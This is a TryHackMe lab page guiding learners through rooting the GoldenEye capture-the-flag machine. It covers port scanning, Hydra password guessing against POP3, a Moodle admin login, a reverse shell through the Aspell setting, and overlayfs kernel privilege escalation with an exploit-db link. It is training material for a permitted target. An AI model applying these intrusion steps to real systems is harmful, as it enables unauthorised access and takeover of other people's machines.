To access material, start machines and answer questions login.
This room will be a guided challenge to hack the James Bond styled box and get root.
Credit to creosote for creating this VM. This machine is used here with the explicit permission of the creator <3
So.. Lets get started!
First things first, connect to our network and deploy the machine.
Use nmap to scan the network for all ports. How many ports are open?
Take a look on the website, take a dive into the source code too and remember to inspect all scripts!
Who needs to make sure they update their default password?
Whats their password?
Now go use those credentials and login to a part of the site.
Onto the next steps..
Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable?
If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?
Inspect port 55007, what service is configured to use this port?
Login using that service and the credentials you found earlier.
What can you find on this service?
What user can break Boris' codes?
Using the users you found on this service, find other users passwords
Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.
Enumeration really is key. Making notes and referring back to them can be lifesaving. We shall now go onto getting a user shell.
If you remembered in some of the emails you discovered, there is the severnaya-station.com website. To get this working, you need up update your DNS records to reveal it.
If you're on Linux edit your "/etc/hosts" file and add:
<machines ip> severnaya-station.com
If you're on Windows do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file
Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir
Try using the credentials you found earlier. Which user can you login as?
Have a poke around the site. What other user can you find?
What was this users password?
Use this users credentials to go through all the services you have found to reveal more emails.
What is the next user you can find from doak?
What is this users password?
Take a look at their files on the moodle (severnaya-station.com)
Download the attachments and see if there are any hidden messages inside them?
Using the information you found in the last task, login with the newly found user.
As this user has more site privileges, you are able to edit the moodles settings. From here get a reverse shell using python and netcat.
Take a look into Aspell, the spell checker plugin.
Now that you have enumerated enough to get an administrative moodle login and gain a reverse shell, its time to priv esc.
Download the linuxprivchecker to enumerate installed development tools.
To get the file onto the machine, you will need to wget your local machine as the VM will not be able to wget files on the internet. Follow the steps to get a file onto your VM:
- Download the linuxprivchecker file locally
- Navigate to the file on your file system
- Do: python -m SimpleHTTPServer 1337 (leave this running)
- On the VM you can now do: wget <your IP>/<file>.py
OR
Enumerate the machine manually.
Whats the kernel version?
This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:
- Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.
- Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.
- Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.
- Make su on overlayfs world writable without changing the owner
- Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
- Execute the modified su binary
You can download the exploit from here: https://www.exploit-db.com/exploits/37292
Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key!
What development tools are installed on the machine?
What is the root flag?
Created by
Room Type
Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!
Users in Room
22,151
Created
2388 days ago
Ready to learn Cyber Security? Create your free account today!
TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.
Already have an account? Log in